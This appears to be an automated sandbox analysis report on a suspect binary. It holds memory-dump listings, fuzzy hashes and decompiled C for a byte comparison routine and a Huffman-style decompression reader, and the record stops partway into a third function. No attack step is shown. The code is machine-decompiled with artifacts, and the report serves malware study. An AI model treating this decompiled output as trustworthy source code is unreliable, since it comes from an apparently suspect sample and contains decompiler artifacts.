0x00000000
0x0041ae6f
0x0041ae4a
0x0041ae4e
0x00000000
0x00000000
0x00000000
0x0041ada5
0x0041ada5
0x0041ada8
0x0041adac
0x0041adae
0x0041adc5
0x0041adc5
0x0041adc9
0x0041adcd
0x0041adcf
0x0041ade6
0x0041ade6
0x0041adea
0x0041adee
0x0041adf0
0x0041ae07
0x0041ae07
0x0041ae0b
0x0041ae0f
0x0041ae11
0x0041ae17
0x0041ae1a
0x0041ae1e
0x0041ae1e
0x00000000
0x0041ae11
0x0041adf6
0x0041adf9
0x0041adfd
0x0041ae01
0x00000000
0x00000000
0x00000000
0x0041ae01
0x0041add5
0x0041add8
0x0041addc
0x0041ade0
0x00000000
0x00000000
0x00000000
0x0041ade0
0x0041adb4
0x0041adb7
0x0041adbb
0x0041adbf
0x00000000
0x00000000
0x00000000
0x0041adbf
0x0041a9c2
0x0041a9c2
0x00000000

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 0f009595415123ad67f2f273e3a05ec4087562c29717103a3f1e37adf6a08e23
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 78C19FB3D1B9B30A8736812D40682BBEE626FC174031FC7E2CCE42F38D962A5C9495D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9C9, Relevance: .4, Instructions: 351
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0041A9C9(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}

0x0041a9c9
0x0041a9c9
0x0041a9cf
0x0041aa42
0x0041aa44
0x0041aa46
0x00000000
0x00000000
0x0041aa4c
0x0041aa52
0x0041aad1
0x0041aad3
0x0041aad5
0x00000000
0x00000000
0x0041aadb
0x0041aae1
0x0041ab60
0x0041ab62
0x0041ab64
0x00000000
0x00000000
0x0041ab6a
0x0041ab70
0x0041abef
0x0041abf1
0x0041abf3
0x00000000
0x00000000
0x0041abff
0x0041ac7f
0x0041ac81
0x0041ac83
0x00000000
0x00000000
0x0041ac89
0x0041ac8f
0x0041ad0e
0x0041ad10
0x0041ad12
0x00000000
0x00000000
0x0041ad18
0x0041ad1e
0x0041ad8f
0x0041ad91
0x0041ad93
0x0041ad95
0x0041ad95
0x0041ad97
0x0041baf3
0x0041baf3
0x0041ad27
0x0041ad29
0x0041ad3a
0x0041ad42
0x0041ad44
0x0041ad55
0x0041ad5d
0x0041ad5f
0x0041ad74
0x0041ad7c
0x0041ad7e
0x0041ad8b
0x0041ad8b
0x00000000
0x0041ad7e
0x0041ad68
0x0041ad6e
0x00000000
0x00000000
0x0041ad70
0x0041ad70
0x00000000
0x0041ad70
0x0041ad4d
0x0041ad53
0x00000000
0x00000000
0x00000000
0x0041ad53
0x0041ad32
0x0041ad38
0x00000000
0x00000000
0x00000000
0x0041ad38
0x0041ac98
0x0041ac9a
0x0041acb1
0x0041acb9
0x0041acbb
0x0041acd2
0x0041acda
0x0041acdc
0x0041acf3
0x0041acfb
0x0041acfd
0x0041ad0a
0x0041ad0a
0x00000000
0x0041acfd
0x0041ace9
0x0041aced
0x00000000
0x00000000
0x00000000
0x0041aced
0x0041acc8
0x0041accc
0x00000000
0x00000000
0x00000000
0x0041accc
0x0041aca7
0x0041acab
0x00000000
0x00000000
0x00000000
0x0041acab
0x0041ac09
0x0041ac0b
0x0041ac22
0x0041ac2a
0x0041ac2c
0x0041ac43
0x0041ac4b
0x0041ac4d
0x0041ac64
0x0041ac6c
0x0041ac6e
0x0041ac7b
0x0041ac7b
0x00000000
0x0041ac6e
0x0041ac5a
0x0041ac5e
0x00000000
0x00000000
0x00000000
0x0041ac5e
0x0041ac39
0x0041ac3d
0x00000000
0x00000000
0x00000000
0x0041ac3d
0x0041ac18
0x0041ac1c
0x00000000
0x00000000
0x00000000
0x0041ac1c
0x0041ab79
0x0041ab7b
0x0041ab92
0x0041ab9a
0x0041ab9c
0x0041abb3
0x0041abbb
0x0041abbd
0x0041abd4
0x0041abdc
0x0041abde
0x0041abeb
0x0041abeb
0x00000000
0x0041abde
0x0041abca
0x0041abce
0x00000000
0x00000000
0x00000000
0x0041abce
0x0041aba9
0x0041abad
0x00000000
0x00000000
0x00000000
0x0041abad
0x0041ab88
0x0041ab8c
0x00000000
0x00000000
0x00000000
0x0041ab8c
0x0041aaea
0x0041aaec
0x0041ab03
0x0041ab0b
0x0041ab0d
0x0041ab24
0x0041ab2c
0x0041ab2e
0x0041ab45
0x0041ab4d
0x0041ab4f
0x0041ab5c
0x0041ab5c
0x00000000
0x0041ab4f
0x0041ab3b
0x0041ab3f
0x00000000
0x00000000
0x00000000
0x0041ab3f
0x0041ab1a
0x0041ab1e
0x00000000
0x00000000
0x00000000
0x0041ab1e
0x0041aaf9
0x0041aafd
0x00000000
0x00000000
0x00000000
0x0041aafd
0x0041aa5b
0x0041aa5d
0x0041aa74
0x0041aa7c
0x0041aa7e
0x0041aa95
0x0041aa9d
0x0041aa9f
0x0041aab6
0x0041aabe
0x0041aac0
0x0041aacd
0x0041aacd
0x00000000
0x0041aac0
0x0041aaac
0x0041aab0
0x00000000
0x00000000
0x00000000
0x0041aab0
0x0041aa8b
0x0041aa8f
0x00000000
0x00000000
0x00000000
0x0041aa8f
0x0041aa6a
0x0041aa6e
0x00000000
0x00000000
0x00000000
0x0041a9d1
0x0041a9d1
0x0041a9d4
0x0041a9d8
0x0041a9da
0x0041a9ed
0x0041a9ed
0x0041a9f1
0x0041a9f5
0x0041a9f7
0x0041aa0a
0x0041aa0a
0x0041aa0e
0x0041aa12
0x0041aa14
0x0041aa27
0x0041aa27
0x0041aa2b
0x0041aa2f
0x0041aa31
0x0041aa37
0x0041aa3a
0x0041aa3e
0x0041aa3e
0x00000000
0x0041aa31
0x0041aa1a
0x0041aa1d
0x0041aa21
0x0041aa25
0x00000000
0x00000000
0x00000000
0x0041aa25
0x0041a9fd
0x0041aa00
0x0041aa04
0x0041aa08
0x00000000
0x00000000
0x00000000
0x0041aa08
0x0041a9e0
0x0041a9e3
0x0041a9e7
0x0041a9eb
0x00000000
0x00000000
0x00000000
0x0041a9eb
0x0041a9c2
0x0041a9c2
0x00000000

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 7198e7a4e3c9cf71aa98f0d5f14c012c278f27fff208265b25d48714b91ae19d
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 93C190B3D1B9B30A8736812D41581ABEE626FD174131FCBE29CD42F38DD23A9DA091D5

Uniqueness

Uniqueness Score: -1.00%

Function 0041416C, Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0041416C(void* __ebx, intOrPtr __ecx, intOrPtr* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v28;
				char _v74;
				char _v90;
				char _v154;
				char _v460;
				signed int _t93;
				unsigned int _t94;
				signed int _t97;
				signed int _t98;
				unsigned int _t111;
				unsigned int _t116;
				unsigned int _t120;
				signed int _t122;
				void* _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				unsigned int _t152;
				void* _t154;
				intOrPtr* _t156;
				intOrPtr _t162;
				intOrPtr* _t166;
				void* _t167;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				unsigned int _t180;
				intOrPtr* _t182;
				intOrPtr _t183;
				intOrPtr* _t186;
				intOrPtr _t187;
				void* _t190;

				_t131 = __ebx;
				_v8 = __ecx;
				if( *((char*)(_a8 + 0x11)) != 0) {
					_t186 = _a4;
					__eflags =  *((char*)(_t186 + 8));
					if( *((char*)(_t186 + 8)) != 0) {
						L5:
						_t7 =  &_a8;
						 *_t7 = _a8 & 0x00000000;
						__eflags =  *_t7;
						_push(_t131);
						do {
							_t132 = E0040953E(_t186) >> 0x0000000c & 0x000000ff;
							E00409527(_t186, 4);
							__eflags = _t132 - 0xf;
							if(_t132 != 0xf) {
								 *(_t190 + _a8 - 0x18) = _t132;
								goto L15;
							}
							_t178 = E0040953E(_t186) >> 0x0000000c & 0x000000ff;
							E00409527(_t186, 4);
							__eflags = _t178;
							if(_t178 != 0) {
								_t180 = _t178 + 2;
								while(1) {
									__eflags = _t180;
									if(_t180 <= 0) {
										break;
									}
									_t180 = _t180 - 1;
									__eflags = _a8 - 0x14;
									if(_a8 >= 0x14) {
										break;
									}
									_t14 =  &_a8;
									 *_t14 = _a8 + 1;
									__eflags =  *_t14;
									 *(_t190 + _a8 - 0x18) = 0;
								}
								_a8 = _a8 - 1;
								goto L15;
							}
							 *(_t190 + _a8 - 0x18) = _t132;
							L15:
							_a8 = _a8 + 1;
							__eflags = _a8 - 0x14;
						} while (__eflags < 0);
						_t182 = _a12 + 0x3bb0;
						E0041237D(__eflags,  &_v28, _t182, 0x14);
						_t29 =  &_a8;
						 *_t29 = _a8 & 0x00000000;
						__eflags =  *_t29;
						do {
							__eflags =  *((char*)(_t186 + 8));
							if( *((char*)(_t186 + 8)) != 0) {
								L20:
								_t93 = E004094F9(_t186);
								_t133 =  *(_t182 + 0x84);
								_t94 = _t93 & 0x0000fffe;
								__eflags = _t94 -  *((intOrPtr*)(_t182 + 4 + _t133 * 4));
								if(_t94 >=  *((intOrPtr*)(_t182 + 4 + _t133 * 4))) {
									_t174 = 0xf;
									_t134 = _t133 + 1;
									__eflags = _t134 - _t174;
									if(_t134 >= _t174) {
										L28:
										_t152 =  *(_t186 + 4) + _t174;
										 *(_t186 + 4) = _t152 & 0x00000007;
										_t136 = _t152 >> 3;
										 *_t186 =  *_t186 + (_t152 >> 3);
										_t154 = 0x10;
										_t97 = (_t94 -  *((intOrPtr*)(_t182 + _t174 * 4)) >> _t154 - _t174) +  *((intOrPtr*)(_t182 + 0x44 + _t174 * 4));
										__eflags = _t97 -  *_t182;
										if(_t97 >=  *_t182) {
											_t97 = 0;
											__eflags = 0;
										}
										_t98 =  *(_t182 + 0xc88 + _t97 * 2) & 0x0000ffff;
										L31:
										__eflags = _t98 - 0x10;
										if(_t98 >= 0x10) {
											__eflags = _t98 - 0x12;
											_t156 = _t186;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t136 = (E0040953E(_t156) >> 9) + 0xb;
													__eflags = _t136;
													_push(7);
												} else {
													_t136 = (E0040953E(_t156) >> 0xd) + 3;
													_push(3);
												}
												E00409527(_t186);
												while(1) {
													__eflags = _t136;
													if(_t136 <= 0) {
														goto L50;
													}
													_t136 = _t136 - 1;
													__eflags = _a8 - 0x1ae;
													if(_a8 >= 0x1ae) {
														goto L51;
													}
													_t71 =  &_a8;
													 *_t71 = _a8 + 1;
													__eflags =  *_t71;
													 *(_t190 + _a8 - 0x1c8) = 0;
												}
												goto L50;
											}
											__eflags = _t98 - 0x10;
											if(_t98 != 0x10) {
												_t136 = (E0040953E(_t156) >> 9) + 0xb;
												__eflags = _t136;
												_push(7);
											} else {
												_t136 = (E0040953E(_t156) >> 0xd) + 3;
												_push(3);
											}
											E00409527(_t186);
											_t120 = _a8;
											__eflags = _t120;
											if(_t120 > 0) {
												while(1) {
													__eflags = _t136;
													if(_t136 <= 0) {
														break;
													}
													_t136 = _t136 - 1;
													__eflags = _t120 - 0x1ae;
													if(_t120 >= 0x1ae) {
														goto L51;
													}
													 *((char*)(_t190 + _t120 - 0x1c8)) =  *((intOrPtr*)(_t190 + _t120 - 0x1c9));
													_t120 = _t120 + 1;
													__eflags = _t120;
													_a8 = _t120;
												}
											}
											goto L50;
										}
										_a8 = _a8 + 1;
										 *(_t190 + _a8 - 0x1c8) = _t98;
										goto L50;
									}
									_t166 = _t182 + 4 + _t134 * 4;
									while(1) {
										__eflags = _t94 -  *_t166;
										if(_t94 <  *_t166) {
											break;
										}
										_t134 = _t134 + 1;
										_t166 = _t166 + 4;
										__eflags = _t134 - 0xf;
										if(_t134 < 0xf) {
											continue;
										}
										goto L28;
									}
									_t174 = _t134;
									goto L28;
								}
								_t167 = 0x10;
								_t122 = _t94 >> _t167 - _t133;
								_t170 = ( *(_t122 + _t182 + 0x88) & 0x000000ff) +  *(_t186 + 4);
								 *_t186 =  *_t186 + (_t170 >> 3);
								 *(_t186 + 4) = _t170 & 0x00000007;
								_t98 =  *(_t182 + 0x488 + _t122 * 2) & 0x0000ffff;
								goto L31;
							}
							_t162 = _v8;
							__eflags =  *_t186 -  *((intOrPtr*)(_t162 + 0x78)) - 5;
							if( *_t186 <=  *((intOrPtr*)(_t162 + 0x78)) - 5) {
								goto L20;
							}
							_t116 = E00411F1D(_t136, _t162);
							__eflags = _t116;
							if(_t116 == 0) {
								L53:
								_t111 = 0;
								L55:
								L56:
								return _t111;
							}
							goto L20;
							L50:
							__eflags = _a8 - 0x1ae;
						} while (_a8 < 0x1ae);
						L51:
						__eflags =  *((char*)(_t186 + 8));
						_t183 = _v8;
						if(__eflags != 0) {
							L54:
							_t187 = _a12;
							E0041237D(__eflags,  &_v460, _t187, 0x132);
							E0041237D(__eflags,  &_v154, _t187 + 0xeec, 0x40);
							E0041237D(__eflags,  &_v90, _t187 + 0x1dd8, 0x10);
							__eflags = _t187 + 0x2cc4;
							E0041237D(_t187 + 0x2cc4,  &_v74, _t187 + 0x2cc4, 0x2c);
							_t111 = 1;
							goto L55;
						}
						__eflags =  *_t186 -  *((intOrPtr*)(_t183 + 0x78));
						if(__eflags <= 0) {
							goto L54;
						}
						goto L53;
					}
					__eflags =  *_t186 -  *((intOrPtr*)(__ecx + 0x78)) - 0x19;
					if( *_t186 <=  *((intOrPtr*)(__ecx + 0x78)) - 0x19) {
						goto L5;
					}
					_t111 = E00411F1D(__ebx, __ecx);
					__eflags = _t111;
					if(_t111 == 0) {
						goto L56;
					}
					goto L5;
				}
				return 1;
			}

0x0041416c
0x0041417c
0x0041417f
0x00414189
0x0041418c
0x00414190
0x004141a9
0x004141a9
0x004141a9
0x004141a9
0x004141ad
0x004141af
0x004141bd
0x004141c0
0x004141c5
0x004141c8
0x0041420f
0x00000000
0x0041420f
0x004141d8
0x004141db
0x004141e0
0x004141e2
0x004141ee
0x00414203
0x00414203
0x00414205
0x00000000
0x00000000
0x004141f1
0x004141f2
0x004141f6
0x00000000
0x00000000
0x004141fb
0x004141fb
0x004141fb
0x004141fe
0x004141fe
0x00414207
0x00000000
0x00414207
0x004141e7
0x00414213
0x00414213
0x00414216
0x00414216
0x00414224
0x0041422f
0x00414234
0x00414234
0x00414234
0x00414238
0x00414238
0x0041423c
0x00414258
0x0041425a
0x0041425f
0x00414265
0x0041426a
0x0041426e
0x0041429b
0x0041429c
0x0041429d
0x0041429f
0x004142b6
0x004142b9
0x004142c0
0x004142c3
0x004142c6
0x004142cd
0x004142d2
0x004142d6
0x004142d8
0x004142da
0x004142da
0x004142da
0x004142dc
0x004142e4
0x004142e4
0x004142e7
0x004142fb
0x004142fe
0x00414300
0x00414357
0x00414374
0x00414374
0x00414377
0x00414359
0x00414363
0x00414366
0x00414366
0x0041437b
0x0041439a
0x0041439a
0x0041439c
0x00000000
0x00000000
0x00414382
0x00414383
0x0041438a
0x00000000
0x00000000
0x0041438f
0x0041438f
0x0041438f
0x00414392
0x00414392
0x00000000
0x0041439a
0x00414302
0x00414305
0x00414322
0x00414322
0x00414325
0x00414307
0x00414311
0x00414314
0x00414314
0x00414329
0x0041432e
0x00414331
0x00414333
0x00414351
0x00414351
0x00414353
0x00000000
0x00000000
0x00414337
0x00414338
0x0041433d
0x00000000
0x00000000
0x00414346
0x0041434d
0x0041434d
0x0041434e
0x0041434e
0x00414355
0x00000000
0x00414333
0x004142ec
0x004142ef
0x00000000
0x004142ef
0x004142a1
0x004142a5
0x004142a5
0x004142a7
0x00000000
0x00000000
0x004142a9
0x004142aa
0x004142ad
0x004142b0
0x00000000
0x00000000
0x00000000
0x004142b2
0x004142b4
0x00000000
0x004142b4
0x00414272
0x00414275
0x0041427f
0x00414287
0x0041428c
0x0041428f
0x00000000
0x0041428f
0x0041423e
0x00414247
0x00414249
0x00000000
0x00000000
0x0041424b
0x00414250
0x00414252
0x004143bb
0x004143bb
0x00414417
0x00414419
0x00000000
0x00414419
0x00000000
0x0041439e
0x0041439e
0x0041439e
0x004143ab
0x004143ab
0x004143af
0x004143b2
0x004143bf
0x004143bf
0x004143d1
0x004143e8
0x004143fc
0x00414403
0x00414410
0x00414415
0x00000000
0x00414415
0x004143b6
0x004143b9
0x00000000
0x00000000
0x00000000
0x004143b9
0x00414198
0x0041419a
0x00000000
0x00000000
0x0041419c
0x004141a1
0x004141a3
0x00000000
0x00000000
0x00000000
0x004141a3
0x00000000

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf7e0b80144e78e7e826182b0c7354f7aa042ead6a897bf140bfea5953800e1
Instruction ID: 57fcc31fe3286bfc10ce1f245f0cb45b1eb39a87866fdb544d2c7bdef3f4e46d
Opcode Fuzzy Hash: baf7e0b80144e78e7e826182b0c7354f7aa042ead6a897bf140bfea5953800e1
Instruction Fuzzy Hash: 77810631600609ABDB15DE59C981BED33E5AB91314F20842FED669B3C2C77CE9C2C759

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7C0, Relevance: .2, Instructions: 231
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0040C7C0(void* __ebx, char* __ecx, char _a4, unsigned int _a8, signed int* _a12) {
				intOrPtr _v8;
				signed int _v9;
				signed int _v10;
				signed int _v11;
				signed int _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed int _v17;
				signed int _v18;
				signed int _v19;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed int _v23;
				signed int _v24;
				char _v25;
				char _v26;
				char _v27;
				signed int _v28;
				char _v29;
				char _v30;
				char _v31;
				signed int _v32;
				char _v33;
				char _v34;
				char _v35;
				signed int _v36;
				char _v37;
				char _v38;
				char _v39;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
